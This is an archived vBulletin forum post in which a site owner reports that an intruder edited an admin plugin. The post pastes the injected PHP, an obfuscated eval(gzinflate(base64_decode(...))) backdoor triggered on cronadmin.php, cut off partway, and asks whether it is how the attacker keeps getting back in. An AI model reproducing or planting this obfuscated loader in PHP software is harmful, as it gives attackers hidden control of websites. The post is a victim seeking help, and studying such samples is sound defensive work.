vb.org Archive - View Single Post - Hacker has changed my FORUMHOME template

VBUsers · #8 10-13-2013, 02:05 AM

i found that the hacker got into the admincp and edited a plugin that has this code in it

Code:

if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) { 

eval(gzinflate(base64_decode('7X37d9s20ujP6Tn5HxCvt5K3tl6O28aJ3dryS45fsWQ7dpLjQ5GUxJgPlaQsK3v6/e13Bi+CT1FJ09373evdMiI4mBkMBoMBMADq9Z6pORdd0h2Ztv38h3p9d0Yu7IlDfiRv/dm4Z719/oPp+55/75tjzw8td1htrLx+/sM/9JFh+dVKBV/q9a7nmKSvBZZOHjW/Ejz/wRqQ6ovfl+8P93sfKmMtHFU+rZB/P/+BwN8yZCVbpG2bmrsHWIZmqE+N6gri+pOYdmDmQcbxIfjzH5Z9zwtTcN39y+v9yw+VvfP21en+We/+8vy8x/IsG56jWS7AR2BHvd7F/dF5F0AQItB9axzGILrty85F7/5s53SfwQwmtn0/8e0Y1OX+u6v9bu/+6rKjYmoBEIjHdDXHrPI0ykpg+o8mvMVJ0X/vd/b2LhmSSZCCudw/Pe/tKzDTkac5FsAMJq4eWp57bz5ZQRhUl8ZeYD3dg5DH04llLK2Q30g8qSpfTXxbWSGbxHwy9eoSQ7q0sjABDv2hgiWufMpEaFiB1rdNA1BaroX5qxWedi9oBFzBLkwQdF/TH4juua6ph4RXUX9GTjx/D2H2Xd0zAB1ULcr655dk4PkI/2i6lunqJtDs62PAdB94E183gfBSZ7b/aLw/m520jsd969X07v1x0NlpvIU0u7NvX5x/Hvf6rTP/7v27XzC9M9sZdg52Z9r725edtvdH5m8Kt3t89XBw3tkf7b5rhAdX9unwqnHQ7jUvdy8bV8N3rVeTvnP92Wjvtm9vzvzOwZl3d/MUdNqAX/zH8Hzuty7tzuHxxvnD06P+8G6498773DkwgL+D2V135+fe4avZZbu5d3r47otuNc+v203d3HuYxnAt9t9Z2zodXt40R9rNlOHf3x1rR2eNu5uD8MQ5e+x3GQzy0ofvd/u7vf7hwWdt3RjpzvWpdrPRNPe8R+3wVXjXfTXVnVeu7hyEkO4et3eZnA8vP5+4uwErZyO86DUiuewfj25bwfCdAzhbl4/99c7wqjWy+4fToeGeDk+7L6cok84+k0m/dTvsXh/v9qzdzrurs5PL6+MeyHT33cOrq3dXxkFnr/HqpNtgskN6zesvtzeGfW7tPtzONqb99m6/e/jqi3HQGN40dx9199Lg9Q3lPDuAsgzvDk8nOtA/7XXWTz7vTE7bL586e52n08/7f40c9vZnZ7OXU4q7uzMDOk//GdkEf7zv7nbv3kM9H92N+44+pLLZ3xj1b64o3M1sbHT24buzYd+uXyLM5MR6GZdNhKunHx6s9x17cjfb7WmH10Gf6thZ/62tlOvw+qFz

the plugin has a lot more code that i cant post in here. is this plugin the hack they keep getting in from? I deleted this a week ago. how is it back?

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01072 seconds Memory Usage 1,775KB Queries Executed 11 (?)
More Information
Template Usage: (1)SHOWTHREAD_SHOWPOST (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_code (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_box (1)post_thanks_button (1)post_thanks_javascript (1)post_thanks_navbar_search (1)post_thanks_postbit_info (1)postbit (1)postbit_onlinestatus (1)postbit_wrapper (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit reputationlevel showthread	Included Files: ./showpost.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/functions_bigthree.php ./includes/class_postbit.php ./includes/class_bbcode.php ./includes/functions_reputation.php ./includes/functions_post_thanks.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_postinfo_query fetch_postinfo fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete showpost_start bbcode_fetch_tags bbcode_create postbit_factory showpost_post postbit_display_start post_thanks_function_post_thanks_off_start post_thanks_function_post_thanks_off_end post_thanks_function_fetch_thanks_start post_thanks_function_fetch_thanks_end post_thanks_function_thanked_already_start post_thanks_function_thanked_already_end fetch_musername postbit_imicons bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete postbit_display_complete post_thanks_function_can_thank_this_post_start showpost_complete
Messages: